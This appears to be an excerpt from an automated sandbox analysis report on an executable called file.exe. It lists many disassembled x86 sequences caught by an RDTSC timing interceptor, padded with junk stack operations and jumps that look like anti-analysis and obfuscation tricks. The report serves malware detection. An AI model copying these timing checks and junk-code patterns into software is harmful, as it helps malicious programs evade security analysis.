Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921F49 second address: 921F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jo 00007FB7D50A5ED6h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EDCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E92B second address: 95E943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E943 second address: 95E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E949 second address: 95E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E94D second address: 95E97C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EE3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E97C second address: 95E982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EDC5 second address: 95EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB7D50A5ED6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jbe 00007FB7D50A5ED6h 0x00000014 jnl 00007FB7D50A5ED6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F061 second address: 95F07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB7D509B84Bh 0x0000000b jmp 00007FB7D509B84Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F07C second address: 95F080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F4D second address: 8E2F75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D509B85Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F75 second address: 8E2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F7B second address: 8E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B848h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F88 second address: 8E2F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F8F second address: 8E2FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D509B84Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2FA7 second address: 8E2FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693C6 second address: 9693D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693D4 second address: 9693D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693D8 second address: 9693FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B84Bh 0x0000000d jmp 00007FB7D509B854h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693FF second address: 969403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96952C second address: 96954C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FB7D509B846h 0x00000010 jp 00007FB7D509B846h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96911E second address: 969122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E43B second address: 96E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E43F second address: 96E44C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E44C second address: 96E477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f je 00007FB7D509B846h 0x00000015 jmp 00007FB7D509B84Ch 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E477 second address: 96E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DC5F second address: 96DC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DC63 second address: 96DCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB7D50A5EDEh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DCA3 second address: 96DCB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB7D509B84Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB7D509B846h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DCB9 second address: 96DCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970965 second address: 9709B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB7D509B857h 0x0000000a jmp 00007FB7D509B84Dh 0x0000000f popad 0x00000010 jmp 00007FB7D509B859h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97063C second address: 970642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970642 second address: 97064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97064C second address: 97065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007FB7D50A5ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97065A second address: 970671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B852h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970671 second address: 970677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970677 second address: 970682 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97521C second address: 975220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974AD2 second address: 974ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974ADF second address: 974B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE9h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c ja 00007FB7D50A5ED8h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974B0C second address: 974B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C33 second address: 974C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C39 second address: 974C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 jg 00007FB7D509B846h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974C50 second address: 974C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 979327 second address: 97932F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97932F second address: 979345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jns 00007FB7D50A5ED6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9784D8 second address: 9784F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B857h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9784F4 second address: 97852A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE9h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97852A second address: 97852F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97852F second address: 978535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978535 second address: 978548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB7D509B84Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978548 second address: 97855C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9786A3 second address: 9786BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB7D509B84Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9786BD second address: 9786CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB7D50A5EDAh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978991 second address: 9789A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B84Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9789A5 second address: 9789B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9789B8 second address: 9789DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FB7D509B862h 0x0000000e jmp 00007FB7D509B84Eh 0x00000013 push edx 0x00000014 je 00007FB7D509B846h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 978E53 second address: 978E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d jnc 00007FB7D50A5EDCh 0x00000013 jo 00007FB7D50A5ED8h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d ja 00007FB7D50A5ED8h 0x00000023 pushad 0x00000024 jg 00007FB7D50A5ED6h 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D739 second address: 97D740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D740 second address: 97D751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a jng 00007FB7D50A5ED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D751 second address: 97D75B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D509B852h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D75B second address: 97D761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DA51 second address: 97DA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE6C second address: 97DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE71 second address: 97DE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97DE76 second address: 97DE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB7D50A5ED6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9218A5 second address: 9218A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9218A9 second address: 921923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FB7D50A5ED8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FB7D50A5ED8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push edx 0x0000002b mov edi, dword ptr [ebp+122D2CCAh] 0x00000031 pop ecx 0x00000032 call 00007FB7D50A5EE5h 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop eax 0x0000003a movzx edi, dx 0x0000003d popad 0x0000003e pop edi 0x0000003f mov ebx, dword ptr [ebp+12485979h] 0x00000045 mov dword ptr [ebp+122D25C2h], ecx 0x0000004b mov edi, dword ptr [ebp+122D3860h] 0x00000051 add eax, ebx 0x00000053 add dword ptr [ebp+122D2FF9h], edi 0x00000059 mov dword ptr [ebp+122D387Eh], edi 0x0000005f push eax 0x00000060 push ebx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921923 second address: 921964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FB7D509B848h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 cld 0x00000024 push 00000004h 0x00000026 sub dword ptr [ebp+122D3A2Fh], ebx 0x0000002c pushad 0x0000002d xor dword ptr [ebp+122D19DDh], ecx 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jc 00007FB7D509B848h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97E166 second address: 97E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9863FE second address: 986404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986404 second address: 98640A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98640A second address: 986412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986412 second address: 986416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986416 second address: 98641A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9846F8 second address: 9846FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98499E second address: 9849B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB7D509B846h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB7D509B84Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9849B4 second address: 9849BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9849BC second address: 9849C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 985275 second address: 98527A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 985571 second address: 9855B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B856h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB7D509B859h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FB7D509B846h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986100 second address: 986104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986104 second address: 986133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FB7D509B84Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007FB7D509B84Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DF91C second address: 8DF920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98B5CD second address: 98B5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98B5D1 second address: 98B5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EB6F second address: 98EB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB7D509B846h 0x0000000e jmp 00007FB7D509B84Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EB88 second address: 98EBAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EDEh 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 popad 0x00000012 push ecx 0x00000013 jnl 00007FB7D50A5ED8h 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE5D second address: 98EE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE61 second address: 98EE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE6B second address: 98EE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE6F second address: 98EE9C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB7D50A5EDDh 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EE9C second address: 98EEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB7D509B852h 0x00000010 rdtsc
